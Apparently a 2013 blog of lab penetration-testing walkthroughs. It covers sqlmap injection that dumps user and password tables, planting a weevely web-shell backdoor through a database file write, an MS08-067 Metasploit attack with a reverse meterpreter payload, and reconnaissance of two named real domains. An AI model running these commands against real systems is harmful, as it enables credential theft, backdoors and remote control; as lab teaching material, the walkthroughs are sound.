Friday, 5 April 2013

Advanced Information Gathering using Maltego

This is the result of information gathering on www.is2c-dojo.com and www.spentera.com using Maltego Radium CE 3.3.0. I chose the Footprint L1 machine:

www.is2c-dojo.com



www.spentera.com

FAILED: I cannot get information about www.spentera.com because the website is temporarily unavailable!


UPDATE!
www.spentera.com is now up, and here's the result:


Upload a backdoor via SQL injection

In the previous post I successfully penetrated the website's database, and now I will go to the next level. In this post I will explain the steps to plant a backdoor through MySQL (using the database server's ability to write files to disk) so that I can come back to the system whenever I want. In this experiment I used DVWA (Damn Vulnerable Web Application) installed on localhost. The tools I used are Mantra, sqlmap, DirBuster and weevely.

First open DVWA in the web browser. Before logging in, activate the Live HTTP Headers tool from Menu > Tools > Application Auditing > Live HTTP Headers to capture the cookie (the PHPSESSID and security level values) that sqlmap needs in order to get past the login check.




After logging in, set the DVWA security level to low and go to the SQL Injection menu. Enter a single quote (') to probe for SQL injection; a database error message means the parameter is vulnerable.



Copy the URL and run sqlmap to enumerate the databases, using the cookie gathered in the previous step. The id parameter is left empty in the URL below; giving it a valid value such as id=1 gives sqlmap a known-good response to compare against and makes detection more reliable.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" --dbs



After that, find the database and the table that hold the application's usernames and password hashes:


./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" -D dvwa --tables



./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" -D dvwa -T users --dump



Now I have the username and password hash of every user. Next I will generate a backdoor to plant on the target. Open weevely and generate the backdoor; it is stored in generate.php and its password is 1234.

./weevely.py generate 1234 generate.php



After the backdoor is generated, I upload generate.php to /var/www/dvwa/bdr.php with sqlmap's --file-write/--file-dest options. This only works because the MySQL user has the FILE privilege, secure_file_priv does not restrict the destination, and the web root is writable by the database server; on a hardened install any one of those would stop it.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" --file-write=/pentest/backdoors/web/weevely/generate.php --file-dest=/var/www/dvwa/bdr.php



Now the backdoor is on the target. Connect to it with weevely using the same password:

./weevely.py http://localhost/dvwa/bdr.php 1234



Now we have successfully entered the system via the backdoor, running commands as the web server's user, and I can play around with the system :)
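As an added example (it is not part of the original post, nor code from DVWA, sqlmap or weevely), the script below reproduces against an in-memory SQLite table what the steps above automate: the single-quote probe, the UNION extraction that sqlmap's --dump performs, the parameterised query that stops it, and the MySQL INTO DUMPFILE statement that --file-write relies on. The sample rows, the function names and the exact payload are assumptions; the DUMPFILE helper is a simplification, since sqlmap splits large files and chooses the technique per DBMS.

```python
import sqlite3

# Constructed sample rows (not DVWA's real data), laid out like DVWA's
# `users` table: user_id, first_name, last_name, user, password (MD5 hash).
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c4428cb38d5f260853678922e3"),
]

def make_db():
    """In-memory SQLite stand-in for DVWA's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn

def vulnerable_lookup(conn, user_id):
    """DVWA 'low' style: the id value is pasted straight into the SQL text."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()

def safe_lookup(conn, user_id):
    """Hardened form: the value is a bound parameter and can never become SQL."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()

def single_quote_probe(conn):
    """The manual check at the top of the post: a lone quote that breaks the
    statement (a database error) is the first sign the parameter is injectable."""
    try:
        vulnerable_lookup(conn, "'")
    except sqlite3.OperationalError:
        return True
    return False

# The kind of UNION payload sqlmap builds once it knows the query returns
# two columns; the trailing comment swallows the application's closing quote.
UNION_PAYLOAD = "' UNION SELECT user, password FROM users -- "

def dump_credentials(conn):
    """What `sqlmap -D dvwa -T users --dump` boils down to on this query."""
    return sorted(vulnerable_lookup(conn, UNION_PAYLOAD))

def mysql_dumpfile_statement(content, dest_path):
    """The MySQL primitive behind sqlmap's --file-write/--file-dest.

    The file body goes in as a hex literal so no quoting is needed, and
    INTO DUMPFILE writes it byte for byte. It only succeeds when the DB user
    has the FILE privilege, secure_file_priv allows dest_path, and mysqld can
    write there. Simplified: sqlmap splits large files and stacks queries."""
    if "'" in dest_path or "\\" in dest_path:
        raise ValueError("destination path must not contain quotes or backslashes")
    return f"SELECT 0x{content.hex()} INTO DUMPFILE '{dest_path}'"

if __name__ == "__main__":
    db = make_db()
    print("injectable:", single_quote_probe(db))
    print("dumped:", dump_credentials(db))
    print("safe query with payload:", safe_lookup(db, UNION_PAYLOAD))
    print(mysql_dumpfile_statement(b"<?php ?>", "/var/www/dvwa/bdr.php"))
```

The point of running both lookups with the same payload is that the fix is not input filtering but keeping data out of the SQL text; the DUMPFILE helper shows why the database account's FILE privilege, not the web application, is what turns an injection into code execution.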

Wednesday, 3 April 2013

Web application SQL vulnerability testing

Experiment: given a web application hosted at localhost/perpustakaan, my job is to check it for vulnerabilities and penetrate the system. To do it ethically and methodically I use the OWASP Testing Guide as my reference.

First let's do some information gathering. Append /robots.txt to the URL to find the paths the site owner asked search engines not to index; these are often admin or internal directories. The target URL is localhost/perpustakaan.



The results show directories that are hidden from ordinary users. Now I will check each of them to see what the folders contain.
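As an added example (not part of the original post), here is a small Python parser for the robots.txt step: it pulls out the Disallow entries and turns them into absolute URLs to visit next, which is exactly the list I walked through by hand. The robots.txt content below is constructed for the example and is not the real file from localhost/perpustakaan; the /admin/ entry is made up.

```python
from urllib.parse import urljoin

# Constructed robots.txt in the style of the one the post found; not the
# real file served by localhost/perpustakaan.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /perpustakaan/proses/
Disallow: /perpustakaan/tampilan/
Disallow: /perpustakaan/admin/   # comment after the rule
Disallow:
Allow: /perpustakaan/index.php
Sitemap: http://localhost/sitemap.xml
"""

def disallowed_paths(robots_txt):
    """Return the unique Disallow paths, in file order, ignoring comments.

    An empty Disallow means 'nothing is disallowed' and is skipped."""
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        if field.strip().lower() == "disallow":
            value = value.strip()
            if value and value not in paths:
                paths.append(value)
    return paths

def candidate_urls(base_url, robots_txt):
    """Turn each hidden path into an absolute URL to browse next."""
    return [urljoin(base_url, p) for p in disallowed_paths(robots_txt)]

if __name__ == "__main__":
    for url in candidate_urls("http://localhost/perpustakaan/", SAMPLE_ROBOTS):
        print(url)
```

Note that robots.txt is advisory only: it tells well-behaved crawlers to stay away, which is why it is such a good map of what the owner wanted kept out of sight.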






Now let's focus on the folder "tampilan" and look for a filename containing the word "view". Click "anggota_view1.php" and the result is:



Gotcha! The page serves the admin view without any login, so I can edit or delete member records just like an admin (a broken access control issue in its own right). Now I will try to get the admin password: I edit one record, take the URL of the update script, and test it for SQL injection with sqlmap.


./sqlmap.py -u http://localhost/perpustakaan/proses/anggota_update1.php?id=301 --dbs



sqlmap reports that the id parameter is injectable and lists the available databases. I choose the "sips" database, which looks like the one backing the target, and enumerate its tables with sqlmap.


I got the table list. Now I will dump the "anggota" (members) and "pegawai" (staff) tables:

./sqlmap.py -u http://localhost/perpustakaan/proses/anggota_update1.php?id=301 -D sips -T anggota,pegawai --dump





Voilà! I got the username and password lists of the members and the admins. If the passwords are stored in clear text I can use one of them directly to log in to the system; if they are hashed they have to be cracked first :)







Tuesday, 2 April 2013

Exploit the SMB service in Windows XP


In the previous chapter I talked about information gathering and service enumeration. Now let's go to the next level. This time I will write about my experiment exploiting one Windows service: SMB. I am still using BackTrack 5 R3 as the attacking machine and a Windows XP installed in VirtualBox as the lab target.

Here are the steps to exploit the Windows XP system:

  1. information gathering, using nmap
  2. service enumeration and vulnerability assessment, using Nessus
  3. exploitation, using the Metasploit Framework
Now let's get started. First turn on Windows XP in VirtualBox and make sure BackTrack and Windows XP can reach each other using ping.


Next, do the information gathering using nmap, found in the menu at BackTrack > Information Gathering > Network Analysis > Network Scanners > nmap. The -A option turns on OS detection, version detection, the default scripts and traceroute; OS detection needs root.

nmap -A 192.168.56.101

From nmap we get information about the OS version, the services and the open ports. I'll process this data to get more detailed information about the open ports using Nessus (if you can't find it in the BackTrack menu, you must install and register it first).

Open https://127.0.0.1:8834 in the web browser and log in with your account. After logging in, click the Scans menu and fill out the form:
name : anything you want
type : choose "run now" to begin scanning immediately
policy : choose the scan policy for your type of network
scan target : your target's address
target file : (optional)

click launch to begin the scan. 

wait for a while, and after completed click the result :


From the result we can see the vulnerabilities ranked low, medium and high. Now we choose the service with high-severity findings, in this case port 445 with 2 high findings.


We can see there are 2 services with high-severity findings, SMB and RPC. Click the SMB service for detailed information.


From the detailed information we can see that this service is highly vulnerable and that Nessus notes it can be exploited with Metasploit.

Now let's begin the penetration using Metasploit, from the menu at BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.

To search the exploit modules type: search platform:windows type:exploit osvdb:48153 path:exploit/windows/smb



Here are the results; just choose one ranked great or excellent. In this case I will use exploit/windows/smb/ms08_067_netapi (MS08-067, the Server service NetAPI overflow).



To see the options the module needs, type: show options.



RHOST is the target host; set it to the target's IP address by typing: set RHOST 192.168.56.101. To begin the penetration we also need a payload (the code that runs on the target once the exploit succeeds). There are plenty of payloads available and ready to use; just choose one of them.



To list all available payloads type: show payloads.



In this case I will use the payload windows/meterpreter/reverse_http. To select it type: set PAYLOAD windows/meterpreter/reverse_http.
Metasploit then needs LHOST, the address the target will connect back to; type: set LHOST 192.168.56.1 to use your own IP address on the host-only network.



To begin the exploitation type exploit and hit enter. If it succeeds, the Meterpreter prompt appears.
To make sure you really are inside the system type: sysinfo (it reports the target's computer name and OS).


And voilà! The system is successfully penetrated and ready to be controlled.

To end the exploitation session type exit and hit enter.
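As an added example (not the post's own commands, and not code from nmap, Nessus or Metasploit), here is a Python script that does the target-selection step above programmatically: it reads the XML that nmap -A -oX writes and lists the hosts that have SMB open and an old Windows OS guess, the combination I picked by hand before confirming it with Nessus. The XML below is a constructed, trimmed sample, not a real scan result; treat the output as candidates only, since only Nessus or the module's own check command tells you the host is actually unpatched.

```python
import xml.etree.ElementTree as ET

# Constructed `nmap -A -oX` output for a lab network (trimmed, not a real scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -oX scan.xml 192.168.56.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2 or SP3" accuracy="98"/></os>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.56.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Linux 3.2 - 3.8" accuracy="95"/></os>
  </host>
</nmaprun>
"""

SMB_PORTS = {139, 445}
# OS families for which ms08_067_netapi is a sensible first pick. This is
# a heuristic of the example, not a statement that every such host is vulnerable.
LEGACY_WINDOWS = ("Windows XP", "Windows 2000", "Windows Server 2003")

def _open_tcp_ports(host):
    ports = set()
    for port in host.iter("port"):
        state = port.find("state")
        if port.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
            ports.add(int(port.get("portid")))
    return ports

def parse_hosts(xml_text):
    """Yield (ip, open_tcp_ports, best_os_guess) for every host that is up."""
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        best = max(host.iter("osmatch"),
                   key=lambda m: int(m.get("accuracy", "0")), default=None)
        os_guess = best.get("name") if best is not None else ""
        yield addr.get("addr"), _open_tcp_ports(host), os_guess

def smb_candidates(xml_text):
    """Hosts with SMB reachable and a legacy Windows guess: where to look first."""
    picks = []
    for ip, ports, os_guess in parse_hosts(xml_text):
        smb = ports & SMB_PORTS
        if smb and any(family in os_guess for family in LEGACY_WINDOWS):
            picks.append((ip, sorted(smb), os_guess))
    return picks

if __name__ == "__main__":
    for ip, ports, os_guess in smb_candidates(SAMPLE_NMAP_XML):
        print(f"{ip}: SMB on {ports}, OS guess '{os_guess}'")
```

The second host is dropped for two independent reasons (port 445 is filtered, and the OS guess is Linux), which is the same filtering the Nessus report does visually when it groups high findings under port 445.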





Wednesday, 27 March 2013

Information Gathering : DNS Analysis

Hello guys, in this post I will try to gather information about websites using the tools provided in BackTrack. The target websites are www.is2c-dojo.com and www.spentera.com. I will try both active and passive information gathering, and I will try to get as much information about those websites as I can.
As we know, information gathering consists of two techniques: passive information gathering and active information gathering. Now let's get started.

Active information gathering
How can we get information if we only know the domain? First we can use nmap to find the IP address, operating system and open ports. The general syntax for nmap is: nmap [Scan Type(s)] [Options] {target specification}. Active techniques send packets to the target, so only do this against systems you are authorised to test. Let's give it a try!

nmap -O www.is2c-dojo.com


nmap -O www.spentera.com


From the output above I get the IP address, an OS guess, and which ports are open or filtered (filtered ports hint at a firewall in between). Now let's dig deeper into the system.

One of the most valuable pieces of information about a website is its DNS, and I will try to get DNS information using dnsenum.
General syntax: dnsenum.pl [Options] <domain>. Note that it expects the bare domain (is2c-dojo.com); the www name is just one host record under it, so passing www.is2c-dojo.com as I do below narrows what it looks at.

./dnsenum.pl www.is2c-dojo.com


./dnsenum.pl www.spentera.com

From dnsenum we obtained the host addresses, the name servers and the mail servers (and, if a name server allows zone transfers, it dumps the whole zone).

Not satisfied with the findings? Now let's try one more tool, called dnsmap. dnsmap brute-forces subdomain names from a wordlist and reports the IP addresses associated with each name that resolves. The general syntax of dnsmap is: dnsmap <target-domain> [options].

Now let's use dnsmap on is2c-dojo.com and spentera.com:


./dnsmap is2c-dojo.com



./dnsmap spentera.com
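As an added example (not dnsmap's code and not part of the original post), here is the dnsmap-style brute force in Python, including the wildcard check that makes such tools usable: if the zone answers every name with the same address, every wordlist entry would look like a hit, so a random label is resolved first and answers matching it are dropped. So that it runs offline, the resolver is injectable and the example uses a constructed answer table; the names and addresses in it are made up and are not real records of is2c-dojo.com or spentera.com. With the default resolver it queries live DNS, which is active reconnaissance.

```python
import random
import socket
import string

# Constructed answer table standing in for live DNS; not real records.
FAKE_ZONE = {
    "is2c-dojo.com": "203.0.113.10",
    "www.is2c-dojo.com": "203.0.113.10",
    "mail.is2c-dojo.com": "203.0.113.25",
    "ftp.is2c-dojo.com": "203.0.113.26",
}

def fake_resolve(name):
    """Stand-in for socket.gethostbyname; raises gaierror on NXDOMAIN like it does."""
    try:
        return FAKE_ZONE[name]
    except KeyError:
        raise socket.gaierror(-2, "Name or service not known")

# Tiny built-in wordlist for the example; dnsmap ships a much larger one.
WORDLIST = ["www", "mail", "ftp", "ns1", "ns2", "dev", "admin", "vpn"]

def wildcard_address(domain, resolve, tries=2):
    """Resolve a random label that cannot exist; an answer means a wildcard record."""
    for _ in range(tries):
        label = "".join(random.choices(string.ascii_lowercase, k=16))
        try:
            return resolve(f"{label}.{domain}")
        except socket.gaierror:
            continue
    return None

def brute_force_subdomains(domain, words=WORDLIST, resolve=socket.gethostbyname):
    """dnsmap-style enumeration: try each word as a label under domain.

    Returns {name: address} for names that resolve, minus wildcard hits."""
    wildcard = wildcard_address(domain, resolve)
    found = {}
    for word in words:
        name = f"{word}.{domain}"
        try:
            address = resolve(name)
        except socket.gaierror:
            continue
        if address == wildcard:     # wildcard-generated false positive
            continue
        found[name] = address
    return found

if __name__ == "__main__":
    for name, address in brute_force_subdomains("is2c-dojo.com", resolve=fake_resolve).items():
        print(f"{name} -> {address}")
```

Comparing only the A record is a simplification: a real tool also compares the CNAME target and may keep wildcard hits that resolve to a different address, but the structure (detect the wildcard first, then filter) is the part that matters.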


Passive Information Gathering
There are a number of techniques for passive information gathering, but I will only write about some of them. The first "tool" I use is googling: I enter a simple query into Google and see how many results are found.

site:is2c-dojo.com

found 516 results

site:spentera.com

found 317 results

The second tool I will use is whois, to obtain the registration details that are publicly provided when a domain name is rented. The syntax is: whois <domain>. Let's try it on is2c-dojo.com and spentera.com.

whois is2c-dojo.com




whois spentera.com




I think that's enough for today's post. I will continue writing about information security next time, and last but not least, sorry for my bad English :)